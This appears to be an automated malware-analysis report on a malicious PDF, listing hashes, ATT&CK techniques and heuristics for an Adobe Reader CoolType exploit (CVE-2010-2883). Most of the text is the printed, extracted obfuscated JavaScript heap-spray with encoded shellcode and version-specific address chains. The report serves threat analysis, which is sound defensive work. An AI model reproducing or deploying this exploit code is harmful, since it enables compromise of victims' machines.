Malicious PDF — malware analysis report

Static analysis result for SHA-256 cfb9445917b1c0f6…

MALICIOUS

PDF

337.7 KB First seen: 2026-05-10
MD5: 7058dd4561f5e5b29c766a6426411263 SHA-1: 9d32cd0fdd5e812116aded7684bbbf24b25e943f SHA-256: cfb9445917b1c0f6b5ca1c4da894176e625e8142d321a93ed9db4de6183e2995
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.003 Phishing: Spearphishing Attachment T1204.002 Malicious File: Malicious Code

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The presence of ASCIIHexDecode filter with exploit indicators suggests an attempt to obfuscate malicious code. The extracted artifact 'javascript_obj0026_000.js' is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload. The document body's garbled nature and the PDF structure with XFA forms and AcroForm buttons further support the exploitation of PDF features for malicious execution.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9985

Heuristics 9

  • Adobe Reader CoolType SING font exploit — CVE-2010-2883 critical CVE likely CVE_2010_2883
    PDF embeds a TrueType/OpenType font with an actual SING table and pairs it with JavaScript heap-spray shellcode. This matches the public Adobe Reader CoolType SING exploit shape for CVE-2010-2883.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com Referenced by PDF JavaScript
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xfa/promoted-desc/In PDF document text
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.7/In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-form/2.8/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0026_000.js pdf-javascript-stream PDF /JS object 26 at offset 0x47BF 9609 bytes
SHA-256: 1d1885b6c800938e7ec00d369726a3bf52b65eebedcdd60cc006c36da6cab07f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 89 of 154 identifiers look randomly generated (e.g. 'M57bcM4a80M156aM4a82MffffMffffM0022M00') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var Juaidai = 12;
var Tolbqnpp = "";

function Vnyhayduv(Gklcbtj,times){
 Ipugpqlbvtw = ""
 var Otdwcwgpeznj;
 var Juaidai = 723;
 for (Otdwcwgpeznj=0;Otdwcwgpeznj<times;Otdwcwgpeznj++){
 Juaidai = 1;
 Ipugpqlbvtw = Ipugpqlbvtw + Gklcbtj;
 }
 return Ipugpqlbvtw;
}

function Oovachwigu(Jxapyyyksdkd){
 var Juaidai = 12;
 return unescape(Jxapyyyksdkd);
}


var Pimfmtggbh = Tolbqnpp+"&%!".charAt(1)+Tolbqnpp;
Pimfmtggbh = Tolbqnpp + Pimfmtggbh + Tolbqnpp+"u"+Tolbqnpp;
Vbiiclkvlyyl = "";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M52e8M0002M5400M7265M696dM616eM657";
Vbiiclkvlyyl = Vbiiclkvlyyl +"4M7250M636fM7365M0073M6f4cM6461M69";
Vbiiclkvlyyl = Vbiiclkvlyyl +"4cM7262M7261M4179M5300M7465M6946M6";
Vbiiclkvlyyl = Vbiiclkvlyyl +"56cM6f50M6e69M6574M0072M6552M6461M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"6946M656cM4300M6572M7461M4665M6c69";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M4165M5700M6972M6574M6946M656cM430";
Vbiiclkvlyyl = Vbiiclkvlyyl +"0M6f6cM6573M6148M646eM656cM4700M74";
Vbiiclkvlyyl = Vbiiclkvlyyl +"65M6554M706dM6150M6874M0041M516aM5";
Vbiiclkvlyyl = Vbiiclkvlyyl +"336Mc931M8b64M3071M768bM8b0cM1c76M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"468bM8b08M207eM368bM3f81M006bM0065";
Vbiiclkvlyyl = Vbiiclkvlyyl +"Mf075M7f81M7204M6e00M7500Mc3e7Mc38";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9M5b03M8d3cM185bM138bM8166M0bfaM75";
Vbiiclkvlyyl = Vbiiclkvlyyl +"01M8b05M6053M05ebM538bMeb70M0100M8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"bc2M1c5aMc301M4a8bM0120M8bc1M2472M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"c601M31c3M56c0M9d8bM02ebM0000Mbd8b";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M02e7M0000M3c03M5183Ma6f3M5e59M037";
Vbiiclkvlyyl = Vbiiclkvlyyl +"4Meb40M8be6Mf395M0002M3100M66c9M0c";
Vbiiclkvlyyl = Vbiiclkvlyyl +"8bM8b42Mef9dM0002M8b00Me7bdM0002M0";
Vbiiclkvlyyl = Vbiiclkvlyyl +"300M8b3cM8dc3M0075Mc031Mf789Mc931M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"f249M57aeMd9f7M5649Mb2e8MffffM5eff";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M3e89M8d5eM655dMde39Me272M8dc3Mf79";
Vbiiclkvlyyl = Vbiiclkvlyyl +"dM0002M5300Mff53M5855Md801M00c7M6c";
Vbiiclkvlyyl = Vbiiclkvlyyl +"68M2e70M40c7M6304M6c70M3100M89c0M4";
Vbiiclkvlyyl = Vbiiclkvlyyl +"2c2Md189Me1c1M421eM5050M5052M5150M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9d8dM02f7M0000Mff53M3655M31c3M50c0";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M8d8dM02dfM0000M6a51M8d04Md78dM000";
Vbiiclkvlyyl = Vbiiclkvlyyl +"2M5100M4d8bM5165M55ffM8b2dMdf85M00";
Vbiiclkvlyyl = Vbiiclkvlyyl +"02M8500M74c0M8176MD7BDM0002M6A00M3";
Vbiiclkvlyyl = Vbiiclkvlyyl 

+"651M7453M906AM9090M9090M9090M9090M";
Vbiiclkvlyyl = Vbiiclkvlyyl 

+"9090M9090M9090M9090M9090M9090M9090";
Vbiiclkvlyyl = Vbiiclkvlyyl 

+"M9090M9090M9090M9090M9090M9090M909";
Vbiiclkvlyyl = Vbiiclkvlyyl 

+"0M9090M9090M9090M9090M9090M9090M90";
Vbiiclkvlyyl = Vbiiclkvlyyl 

+"90M9090M9090M8190MD7B5M0002MAF00MD";
Vbiiclkvlyyl = Vbiiclkvlyyl +"780M317EM50c0M8d8dM02dfM0000M198bM";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9090M5351M8d8dM02d7M0000M8b51Me38d";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M0002M5100M55ffM8542M0fc0M6685Mfff";
Vbiiclkvlyyl = Vbiiclkvlyyl +"fM8bffMe385M0002M5000M55ffMc34cMd2";
Vbiiclkvlyyl = Vbiiclkvlyyl +"31Mdb31M6a52M5302Mf868MffffM52ffM5";
Vbiiclkvlyyl = Vbiiclkvlyyl +"5ffM5a1eMff3dMffffM737fM5232M8d53M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"df8dM0002M5100M086aM8d8dM02d7M0000";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M5251M55ffM5a2dMf883M7e00M8b16Mdf8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"5M0002M8300M08f8M0b75M858bM02d7M00";
Vbiiclkvlyyl = Vbiiclkvlyyl +"00M453bM7465M4203Mb6ebM6a52M5302M9";
Vbiiclkvlyyl = Vbiiclkvlyyl +"d8bM02dbM0000Mdbf7M5253M55ffM5a1eM";
Vbiiclkvlyyl = Vbiiclkvlyyl +"5dc3M11e8MfffeM89ffMe785M0002Me800";
Vbiiclkvlyyl = Vbiiclkvlyyl +"Mfe2cMffffM8d89M02ebM0000M9d89M02e";
Vbiiclkvlyyl = Vbiiclkvlyyl +"fM0000Mb589M02f3M0000M7ae8MfffeMe8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"ffMff72MffffM5589Me865Mfe8fMffffM8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"589M02e3M0000Mbae8MfffeM8dffMf79dM";
Vbiiclkvlyyl = Vbiiclkvlyyl +"0002M5300M55ffM2911M53dbM5353M0553";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M17a0M0000Md0ffM4d8bM8d00Md7b5M000";
Vbiiclkvlyyl = Vbiiclkvlyyl +"2M8d00M00beM0002M0f00M8831M4606Mfe";
Vbiiclkvlyyl = Vbiiclkvlyyl +"39Mf775Mee89Mbd8dM02c9M0000M310fM0";
Vbiiclkvlyyl = Vbiiclkvlyyl +"688M3946M75feM4bf7M5353Md1ff";

var Enchfcuvtwn = (app.viewerVersion / 10.0);
Vbiiclkvlyyl = Vbiiclkvlyyl.replace(/M/g,Pimfmtggbh);
var Ycjygwhscgnv = this;
Vbiiclkvlyyl = Oovachwigu(Vbiiclkvlyyl);

function Htbcdm(Vbiiclkvlyyl,Bzubmlxlbf,Bkesxwjtsb){
 var Olalun = 1024;
 
 var Saqytin = Vnyhayduv(Bzubmlxlbf,Olalun);
 var Uipcwelcwl = Vnyhayduv(Bzubmlxlbf,Olalun-(Vbiiclkvlyyl.length/2))+Vbiiclkvlyyl;
 
 var FvzlbcjckcfOfFirstEntry = Vnyhayduv(Bzubmlxlbf,Olalun-18);
 var FvzlbcjckcfOfOtherEntry = Vnyhayduv(Bzubmlxlbf,Olalun-11);

 var Vxcuul = [];
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < 16-2; Otdwcwgpeznj++ ){
 Vxcuul.push( Saqytin );
 }
 Vxcuul.push(Uipcwelcwl);
 var Lvxgmunsmebw = Vxcuul.join("");

 Ycjygwhscgnv.Hpedba = new Array();
 var Wafaue = 0;
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < Bkesxwjtsb; Otdwcwgpeznj++ ){
 if (Otdwcwgpeznj == 0){
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfFirstEntry+Lvxgmunsmebw;
 } else{
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfOtherEntry+Lvxgmunsmebw;
 }
 }
}


Uzwnncyhd = "M4142M4241";
Uzwnncyhd = Uzwnncyhd.replace(/M/g,Pimfmtggbh);
Uzwnncyhd = Oovachwigu(Uzwnncyhd);


if ( app.platform == "WIN" ){ 
 if ( Enchfcuvtwn <= 0.5999 ) {
 app.alert("Please update your PDF viewer software.");
 } else if ( Enchfcuvtwn <= 0.6999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 11;
 } else if ( Enchfcuvtwn <= 0.7999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 12; 
 } else if ( Enchfcuvtwn <= 0.8999999999 ) {
 Lfobubh = "";
Lfobubh = Lfobubh +"M17f2M4a82M5000M4a84M630fM4a80M7ec9M4a";
Lfobubh = Lfobubh +"81M203cM4a82M57bcM4a80M156aM4a82M54e0M";
Lfobubh = Lfobubh +"4a82M0000M1000M0000M0000M0000M0000M000";
Lfobubh = Lfobubh +"2M0000M0102M0000M0000M0000M17f2M4a82M1";
Lfobubh = Lfobubh +"56aM4a82Mfe83M4a81Me982M4a81M0008M0000";
Lfobubh = Lfobubh +"M597dM4a80M7ec9M4a81M2038M4a82M57bcM4a";
Lfobubh = Lfobubh +"80M156aM4a82MffffMffffM0000M0000M0040M";
Lfobubh = Lfobubh +"0000M0000M0000M0000M0001M0000M0000M17f";
Lfobubh = Lfobubh +"2M4a82M156aM4a82Mfe83M4a81Me982M4a81M0";
Lfobubh = Lfobubh +"008M0000M597dM4a80M7ec9M4a81M2030M4a82";
Lfobubh = Lfobubh +"M57bcM4a80M156aM4a82MffffMffffM0022M00";
Lfobubh = Lfobubh +"00M0000M0000M0000M0000M0000M0001M17f2M";
Lfobubh = Lfobubh +"4a82M5004M4a84M630fM4a80M17f2M4a82M156";
Lfobubh = Lfobubh +"aM4a82Mfe83M4a81Me982M4a81M0030M0000M5";
Lfobubh = Lfobubh +"97dM4a80M7ec9M4a81M5004M4a84Ma649M4a81";
Lfobubh = Lfobubh +"M17f2M4a82M156aM4a82Mfe83M4a81Me982M4a";
Lfobubh = Lfobubh +"81M0020M0000M597dM4a80M17f2M4a82M156aM";
Lfobubh = Lfobubh +"4a82M00a0M4a82M7ec9M4a81M0034M0000M795";
Lfobubh = Lfobubh +"aM4a80M17f2M4a82M156aM4a82Mfe83M4a81Me";
Lfobubh = Lfobubh +"982M4a81M000aM0000M597dM4a80M7ec9M4a81";
Lfobubh = Lfobubh +"M2140M4a82M57bcM4a80MffffMffffMffffMff";
Lfobubh = Lfobubh +"ffMffffMffffM1000M0000M258bM5000M4a84M";
Lfobubh = Lfobubh +"4d4d";

 Lfobubh = Lfobubh.replace(/M/g,Pimfmtggbh);
 Lfobubh = Oovachwigu(Lfobubh);
 Djcxdzbvuhef = "";
Djcxdzbvuhef = Djcxdzbvuhef +"M12c4M4a80";

 Djcxdzbvuhef = Djcxdzbvuhef.replace(/M/g,Pimfmtggbh);
 Djcxdzbvuhef = Oovachwigu(Djcxdzbvuhef);
 
 Htbcdm(Lfobubh + Vbiiclkvlyyl,Djcxdzbvuhef,2000);
 Ycjygwhscgnv.pageNum = 13;
 } else if ( Enchfcuvtwn <= 0.9999999999 ) {
 Nircgsipef = "";
Nircgsipef = Nircgsipef +"M63a5M4a80M0000M4a8aM2196M4";
Nircgsipef = Nircgsipef +"a80M1f90M4a80M903cM4a84Mb69";
Nircgsipef = Nircgsipef +"2M4a80M1064M4a80M22c8M4a85M";
Nircgsipef = Nircgsipef +"0000M1000M0000M0000M0000M00";
Nircgsipef = Nircgsipef +"00M0002M0000M0102M0000M0000";
Nircgsipef = Nircgsipef +"M0000M63a5M4a80M1064M4a80M2";
Nircgsipef = Nircgsipef +"db2M4a84M2ab1M4a80M0008M000";
Nircgsipef = Nircgsipef +"0Ma8a6M4a80M1f90M4a80M9038M";
Nircgsipef = Nircgsipef +"4a84Mb692M4a80M1064M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffM0000M0000M0040M0000";
Nircgsipef = Nircgsipef +"M0000M0000M0000M0001M0000M0";
Nircgsipef = Nircgsipef +"000M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0008M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M1f90M4a80M9030M4a";
Nircgsipef = Nircgsipef +"84Mb692M4a80M1064M4a80Mffff";
Nircgsipef = Nircgsipef +"MffffM0022M0000M0000M0000M0";
Nircgsipef = Nircgsipef +"000M0000M0000M0001M63a5M4a8";
Nircgsipef = Nircgsipef +"0M0004M4a8aM2196M4a80M63a5M";
Nircgsipef = Nircgsipef +"4a80M1064M4a80M2db2M4a84M2a";
Nircgsipef = Nircgsipef +"b1M4a80M0030M0000Ma8a6M4a80";
Nircgsipef = Nircgsipef +"M1f90M4a80M0004M4a8aMa7d8M4";
Nircgsipef = Nircgsipef +"a80M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0020M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M63a5M4a80M1064M4a";
Nircgsipef = Nircgsipef +"80MaedcM4a80M1f90M4a80M0034";
Nircgsipef = Nircgsipef +"M0000Md585M4a80M63a5M4a80M1";
Nircgsipef = Nircgsipef +"064M4a80M2db2M4a84M2ab1M4a8";
Nircgsipef = Nircgsipef +"0M000aM0000Ma8a6M4a80M1f90M";
Nircgsipef = Nircgsipef +"4a80M9170M4a84Mb692M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffMffffMffffMffffMffff";
Nircgsipef = Nircgsipef +"M1000M0000M258bM0000M4a8aM4";
Nircgsipef = Nircgsipef +"d4d";

 Nircgsipef = Nircgsipef.replace(/M/g,Pimfmtggbh);
 Nircgsipef = Oovachwigu(Nircgsipef);
 Zxwhjjr = "";
Zxwhjjr = Zxwhjjr +"M1064M4a80";

 Zxwhjjr = Zxwhjjr.replace(/M/g,Pimfmtggbh);
 Zxwhjjr = Oovachwigu(Zxwhjjr);
 
 Htbcdm(Nircgsipef + Vbiiclkvlyyl,Zxwhjjr,2000);
 Ycjygwhscgnv.pageNum = 14;
 } else{
 app.alert("Please update your PDF viewer software.");
 }
}else{
 app.alert("Please update your PDF viewer software.");
}
font_00_sfnt_off000070c8.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x70C8 8084 bytes
SHA-256: e31f8c8507e52f29008d946a00becde9f839e34cb108985ce66167bf881adafa
font_10_sfnt_off000149fa.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x149FA 65932 bytes
SHA-256: 422bc5698ba5d9d4818f6a2d8b3abca2f723e713b44a15c390139d2c976a1388
font_11_sfnt_off0001e85c.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1E85C 65932 bytes
SHA-256: 7e24ee16c8b09ee74d61445f29c3c0a95abfdf17fc1008606394f159dbd0c106
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
font_12_sfnt_off000286ba.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x286BA 65932 bytes
SHA-256: 57e24925bc6bdb98d38e8b4ba3b87f80f75c5e49ea9a522486790d7dc6848549
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
font_13_sfnt_off000324e1.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x324E1 65932 bytes
SHA-256: 1f068d668b316fcb46f0801be00137fb749cc7fda5ca15e442829d6c303d8f99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.